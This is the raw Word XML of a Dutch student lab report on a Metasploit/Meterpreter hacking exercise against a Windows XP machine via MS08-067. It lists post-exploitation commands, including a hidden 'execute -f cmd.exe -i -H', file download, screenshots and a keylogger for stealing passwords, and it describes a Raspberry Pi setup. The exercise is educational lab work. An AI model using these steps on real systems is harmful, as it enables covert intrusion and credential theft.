      <w:bookmarkStart w:id="10" w:name="_Toc440110974"/>
      <w:r>
        <w:t>Bewegen door folders</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00E6148E" w:rsidRDefault="0074420B" w:rsidP="00CE7015">
      <w:r>
        <w:t xml:space="preserve">Met </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> geeft men de huidige directory weer , met cd verander je</w:t>
      </w:r>
      <w:r w:rsidR="00E45629">
        <w:t xml:space="preserve"> van directory bv: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E45629" w:rsidRDefault="00E45629" w:rsidP="00CE7015">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C3D3772" wp14:editId="24261B17">
            <wp:extent cx="7092542" cy="57150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137176" cy="57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BBC" w:rsidRDefault="00E86C38" w:rsidP="00E86C38">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc440110975"/>
      <w:r>
        <w:t>Download bestanden</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00205ADE" w:rsidRDefault="00F44BBC" w:rsidP="00D5180F">
      <w:r>
        <w:t xml:space="preserve">Met de download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kan men bestanden downloaden van het slachtoffer bv: download </w:t>
      </w:r>
      <w:r w:rsidR="00E45629">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7313BC09" wp14:editId="3367CE51">
            <wp:extent cx="4813660" cy="619125"/>
            <wp:effectExtent l="0" t="0" r="635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85226" cy="64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ADE" w:rsidRDefault="00205ADE" w:rsidP="00E86C38">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000F6254" w:rsidRDefault="00E86C38" w:rsidP="00E86C38">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc440110976"/>
      <w:r>
        <w:t>Start programma’s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="00F44BBC" w:rsidRDefault="00F44BBC" w:rsidP="00CE7015">
      <w:r>
        <w:t xml:space="preserve">Met de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execut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kan men </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>programmas’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> runnen bv: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –f cmd.exe –i –H</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6254" w:rsidRDefault="007C2CC4" w:rsidP="00CE701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35pt;height:46.05pt">
            <v:imagedata r:id="rId45" o:title="execute ie"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6254" w:rsidRDefault="000F6254" w:rsidP="00CE7015">
      <w:r>
        <w:t xml:space="preserve">Zoals je ziet is bij het slachtoffer de IEXPLORE executable gestart , dit is wel in de achtergrond dus het slachtoffer ziet niet dat dit proces gestart is tenzij ze naar taakbeheer gaan kijken. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00664499" w:rsidRDefault="007C2CC4" w:rsidP="00CE7015">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:244.45pt;height:200.1pt">
            <v:imagedata r:id="rId46" o:title="bewijsexecute ie"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00E86C38">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc440110977"/>
      <w:r>
        <w:t>Zoek specifieke bestanden bij naam</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="00664499" w:rsidRDefault="00EA4080" w:rsidP="00CE7015">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-.35pt;margin-top:17.7pt;width:435.75pt;height:55.5pt;z-index:251664384;mso-position-horizontal-relative:text;mso-position-vertical-relative:text;mso-width-relative:page;mso-height-relative:page">
            <v:imagedata r:id="rId47" o:title="search"/>
            <w10:wrap type="square"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00F44BBC">
        <w:t xml:space="preserve">De search command </w:t>
      </w:r>
      <w:r w:rsidR="00664499">
        <w:t>voorziet een manier om specifieke bestanden te zoeken op het systeem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205ADE" w:rsidRDefault="00205ADE" w:rsidP="00E86C38">
      <w:pPr>
        <w:pStyle w:val="Kop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05ADE" w:rsidRDefault="00205ADE" w:rsidP="00E86C38">
      <w:pPr>
        <w:pStyle w:val="Kop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0F6254" w:rsidRDefault="00E86C38" w:rsidP="00205ADE">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc440110978"/>
      <w:r>
        <w:t>Neem screenshots</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="000F6254" w:rsidRDefault="00EA4080" w:rsidP="00CE7015">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1027" type="#_x0000_t75" style="position:absolute;margin-left:-.35pt;margin-top:15.85pt;width:237pt;height:36pt;z-index:251666432;mso-position-horizontal-relative:text;mso-position-vertical-relative:text;mso-width-relative:page;mso-height-relative:page">
            <v:imagedata r:id="rId48" o:title="takescreenshot"/>
            <w10:wrap type="square"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="000F6254">
        <w:t>Men kan ook s</w:t>
      </w:r>
      <w:r w:rsidR="00E86C38">
        <w:t>creenshots nemen</w:t>
      </w:r>
      <w:r w:rsidR="000F6254">
        <w:t xml:space="preserve"> , dit doet men met de screenshot command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F6254" w:rsidRDefault="000F6254" w:rsidP="00CE7015"/>
    <w:p w:rsidR="000F6254" w:rsidRDefault="000F6254" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00EA4080" w:rsidP="00CE7015">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1028" type="#_x0000_t75" style="position:absolute;margin-left:.5pt;margin-top:14.75pt;width:309.1pt;height:187.5pt;z-index:251668480;mso-position-horizontal-relative:text;mso-position-vertical-relative:text;mso-width-relative:page;mso-height-relative:page">
            <v:imagedata r:id="rId49" o:title="screenshotproof"/>
            <w10:wrap type="square"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00205ADE">
        <w:t>Zoals je ziet word deze screenshot in een default locatie geplaatst namelijk de home folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00205ADE" w:rsidP="00CE7015">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Dit is de screenshot die getrokken is.</w:t>
      </w:r>
      <w:r w:rsidR="00EA4080">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1029" type="#_x0000_t75" style="position:absolute;margin-left:-3.7pt;margin-top:2.45pt;width:307.5pt;height:230.25pt;z-index:251672576;mso-position-horizontal-relative:text;mso-position-vertical-relative:text;mso-width-relative:page;mso-height-relative:page">
            <v:imagedata r:id="rId50" o:title="screenshot"/>
            <w10:wrap type="square"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00E86C38">
      <w:pPr>
        <w:pStyle w:val="Kop2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc440110979"/>
      <w:r>
        <w:t>Steel passwoorden</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1AAFB7A1" wp14:editId="62244FA3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>577215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="3740785"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides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en meterpreter sessie is ook een effectieve manier om wachtwoorden te vinden namelijk met een keylogger , dit is een functie die elke toets die ingedrukt word onthoud en naar de hacker stuurt:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86C38" w:rsidRDefault="00785CB3" w:rsidP="00CE7015">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="nl-BE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29FAE7D6" wp14:editId="51DEC6B4">
            <wp:extent cx="5760720" cy="848995"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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38" w:rsidRDefault="00E86C38" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00793324" w:rsidRDefault="00793324" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00793324" w:rsidRDefault="00793324" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00793324" w:rsidRDefault="00793324" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00793324" w:rsidRDefault="00793324" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00793324" w:rsidRDefault="002F0E1D" w:rsidP="002F0E1D">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Raspberry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pi :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F0E1D" w:rsidRDefault="002F0E1D" w:rsidP="002F0E1D">
      <w:r>
        <w:t xml:space="preserve">Nu moesten we alles kunnen uitvoeren met de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>raspberry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pi via remote shell , dit was onze opstelling:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F0E1D" w:rsidRDefault="007C2CC4" w:rsidP="002F0E1D">
      <w:r>
        <w:pict>
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:452.95pt;height:253.65pt">
            <v:imagedata r:id="rId53" o:title="WP_20160108_10_26_08_Pro_LI"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F0E1D" w:rsidRPr="002F0E1D" w:rsidRDefault="002F0E1D" w:rsidP="002F0E1D">
      <w:r>
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>raspberry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pi is verbonden met het wifi netwerk van AP net zoals onze virtual machines , dit laat ons toe om via SSH een verbinding op te stellen tussen de kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> machine en de RPI zodanig dat de RPI al het werk doet (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) en dat de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>commands</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> moeten worden ingegeven via de hacker machine.</w:t>
      </w:r>
      <w:r w:rsidR="007C2CC4">
        <w:pict>
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:452.95pt;height:253.65pt">
            <v:imagedata r:id="rId54" o:title="WP_20160108_10_25_49_Pro_LI"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00793324" w:rsidRDefault="00793324" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00793324" w:rsidRDefault="00793324" w:rsidP="00CE7015"/>
    <w:p w:rsidR="00793324" w:rsidRDefault="00793324" w:rsidP="00CE7015"/>
    <w:p w:rsidR="007C2CC4" w:rsidRDefault="007C2CC4" w:rsidP="007C2CC4">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Besluit </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C2CC4" w:rsidRPr="007C2CC4" w:rsidRDefault="007C2CC4" w:rsidP="007C2CC4">
      <w:pPr>
        <w:pStyle w:val="Kop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C2CC4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dit project heeft ons geleerd dat een computer hacke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met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windows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xp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  <w:r w:rsidRPr="007C2CC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igenlijk verontrustend simpel is , bij de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C2CC4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C2CC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7C2CC4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MS08-067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hadden we enkel het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adress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nodig van het slachtoffer.. </w:t>
      </w:r>
      <w:r w:rsidR="006C4DD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vanaf we dan binnen waren op de computer van het slachtoffer is het eigenlijk kinderspel . We gaven gewoon wat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C4DDB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>commands</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C4DD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 en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C4DDB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C4DD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eed alles voor ons zoals een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C4DDB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>printscreen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C4DD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nemen , iets downloaden , …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e hebben wel ondervonden dat heel veel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exploits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niet meer werken als je een vo</w:t>
      </w:r>
      <w:r w:rsidR="006C4DD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lledig up-to-date computer hebt , dit komt omdat er telkens dat een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C4DDB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C4DD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ntdekt word er een patch uitkomt die deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C4DDB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vulnerablity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C4DD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ruit haalt. </w:t>
      </w:r>
      <w:r w:rsidR="00E8131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Het was een leuke ervaring voor ons om eens in een hacker zijn schoenen te staan , iedereen vind het wel eens leuk om “stoute dingen”(zoals u het altijd beschrijft) te doen. </w:t>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="007C2CC4" w:rsidRPr="007C2CC4" w:rsidRDefault="007C2CC4" w:rsidP="007C2CC4"/>
    <w:p w:rsidR="007C2CC4" w:rsidRDefault="007C2CC4" w:rsidP="00793324">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C2CC4" w:rsidRDefault="007C2CC4" w:rsidP="00793324">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00793324" w:rsidRDefault="00793324" w:rsidP="00793324">
      <w:pPr>
        <w:pStyle w:val="Kop1"/>
      </w:pPr>
      <w:r>
        <w:t>Bronnen:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00793324" w:rsidRPr="00793324" w:rsidRDefault="00793324" w:rsidP="00793324">
      <w:r>
        <w:t>gedetailleerde info over meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00793324" w:rsidRDefault="00EA4080" w:rsidP="00793324">
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidR="00793324" w:rsidRPr="007C2F75">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/docs/18229.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00793324" w:rsidRDefault="00EA4080" w:rsidP="00793324">
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r w:rsidR="00793324" w:rsidRPr="007C2F75">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://dev.metasploit.com/documents/meterpreter.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00793324">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00793324" w:rsidRDefault="00793324" w:rsidP="00793324">
      <w:r>
        <w:t>Info over exploits :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00793324" w:rsidRDefault="00EA4080" w:rsidP="00793324">
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r w:rsidR="00793324" w:rsidRPr="007C2F75">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/db/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00793324" w:rsidRDefault="00EA4080" w:rsidP="00793324">
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidR="00793324" w:rsidRPr="007C2F75">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00793324" w:rsidRDefault="00793324" w:rsidP="00793324"/>
    <w:p w:rsidR="00793324" w:rsidRPr="00793324" w:rsidRDefault="00793324" w:rsidP="00793324"/>
    <w:sectPr w:rsidR="00793324" w:rsidRPr="00793324">
      <w:headerReference w:type="default" r:id="rId5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080" w:rsidRDefault="00EA4080" w:rsidP="00D914C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00EA4080" w:rsidRDefault="00EA4080" w:rsidP="00D91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080" w:rsidRDefault="00EA4080" w:rsidP="00D914C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00EA4080" w:rsidRDefault="00EA4080" w:rsidP="00D91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48E" w:rsidRDefault="00E6148E">
    <w:pPr>
      <w:pStyle w:val="Koptekst"/>
    </w:pPr>
    <w:r>
      <w:t>Nick Lauwerijs</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00E6148E" w:rsidRDefault="00E6148E">
    <w:pPr>
      <w:pStyle w:val="Koptekst"/>
    </w:pPr>
    <w:r>
      <w:t>Berten Bevers</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00E6148E" w:rsidRDefault="00E6148E">
    <w:pPr>
      <w:pStyle w:val="Koptekst"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Koen </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:t>Verstraelen</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/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4C"/>
    <w:rsid w:val="00041A16"/>
    <w:rsid w:val="00047FB4"/>
    <w:rsid w:val="0005015D"/>
    <w:rsid w:val="000E57E6"/>
    <w:rsid w:val="000F6254"/>
    <w:rsid w:val="00120DEA"/>
    <w:rsid w:val="00143DDC"/>
    <w:rsid w:val="0015265A"/>
    <w:rsid w:val="00170154"/>
    <w:rsid w:val="001C1A85"/>
    <w:rsid w:val="001D73E7"/>
    <w:rsid w:val="00205ADE"/>
    <w:rsid w:val="002418A2"/>
    <w:rsid w:val="002D45DE"/>
    <w:rsid w:val="002F0E1D"/>
    <w:rsid w:val="002F1526"/>
    <w:rsid w:val="002F7F2D"/>
    <w:rsid w:val="0030625A"/>
    <w:rsid w:val="003B0FCE"/>
    <w:rsid w:val="00421DF3"/>
    <w:rsid w:val="004B1182"/>
    <w:rsid w:val="004C4BAC"/>
    <w:rsid w:val="004C7F52"/>
    <w:rsid w:val="004D1DD1"/>
    <w:rsid w:val="004F55A0"/>
    <w:rsid w:val="005319D3"/>
    <w:rsid w:val="00536FD9"/>
    <w:rsid w:val="0057699B"/>
    <w:rsid w:val="00587881"/>
    <w:rsid w:val="00597BBE"/>
    <w:rsid w:val="005A0C2F"/>
    <w:rsid w:val="005C4C57"/>
    <w:rsid w:val="005D1F41"/>
    <w:rsid w:val="00603B12"/>
    <w:rsid w:val="0060470D"/>
    <w:rsid w:val="006104E6"/>
    <w:rsid w:val="00622097"/>
    <w:rsid w:val="00654966"/>
    <w:rsid w:val="00661CA5"/>
    <w:rsid w:val="00664499"/>
    <w:rsid w:val="006C4DDB"/>
    <w:rsid w:val="006D5A66"/>
    <w:rsid w:val="0074420B"/>
    <w:rsid w:val="00772B3F"/>
    <w:rsid w:val="00785CB3"/>
    <w:rsid w:val="00793324"/>
    <w:rsid w:val="007C2CC4"/>
    <w:rsid w:val="007F0FC5"/>
    <w:rsid w:val="00845D85"/>
    <w:rsid w:val="008616CF"/>
    <w:rsid w:val="00885F6E"/>
    <w:rsid w:val="00893AED"/>
    <w:rsid w:val="008C0D82"/>
    <w:rsid w:val="009E718A"/>
    <w:rsid w:val="009F2B82"/>
    <w:rsid w:val="00A518BB"/>
    <w:rsid w:val="00A954DE"/>
    <w:rsid w:val="00AF674D"/>
    <w:rsid w:val="00B01AE9"/>
    <w:rsid w:val="00B1799A"/>
    <w:rsid w:val="00B3085B"/>
    <w:rsid w:val="00B57AF8"/>
    <w:rsid w:val="00B67528"/>
    <w:rsid w:val="00B83FB4"/>
    <w:rsid w:val="00B93F46"/>
    <w:rsid w:val="00BB4B06"/>
    <w:rsid w:val="00BE7301"/>
    <w:rsid w:val="00BF10AC"/>
    <w:rsid w:val="00C52328"/>
    <w:rsid w:val="00CC6792"/>
    <w:rsid w:val="00CD033E"/>
    <w:rsid w:val="00CE3D81"/>
    <w:rsid w:val="00CE7015"/>
    <w:rsid w:val="00D15571"/>
    <w:rsid w:val="00D5180F"/>
    <w:rsid w:val="00D52650"/>
    <w:rsid w:val="00D914C0"/>
    <w:rsid w:val="00DD5060"/>
    <w:rsid w:val="00DE389D"/>
    <w:rsid w:val="00DE44D0"/>
    <w:rsid w:val="00E45629"/>
    <w:rsid w:val="00E54F06"/>
    <w:rsid w:val="00E6148E"/>
    <w:rsid w:val="00E6371C"/>
    <w:rsid w:val="00E75755"/>
    <w:rsid w:val="00E81317"/>
    <w:rsid w:val="00E86C38"/>
    <w:rsid w:val="00EA4080"/>
    <w:rsid w:val="00EB61A7"/>
    <w:rsid w:val="00EE2CD3"/>
    <w:rsid w:val="00EF14C0"/>
    <w:rsid w:val="00EF5E15"/>
    <w:rsid w:val="00F27542"/>
    <w:rsid w:val="00F44BBC"/>
    <w:rsid w:val="00F6274C"/>
    <w:rsid w:val="00F80FAE"/>
    <w:rsid w:val="00FA31FF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2321C67B-4DD3-404D-9998-83DD9ADF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67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18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D914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3085B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91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14C0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Voettekst">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Standaard"/>
    <w:link w:val="VoettekstChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D91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14C0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titel">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Standaard"/>
    <w:next w:val="Standaard"/>
    <w:link w:val="TitelChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00D914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914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3Char">
    <w:name w:val="Kop 3 Char"/>
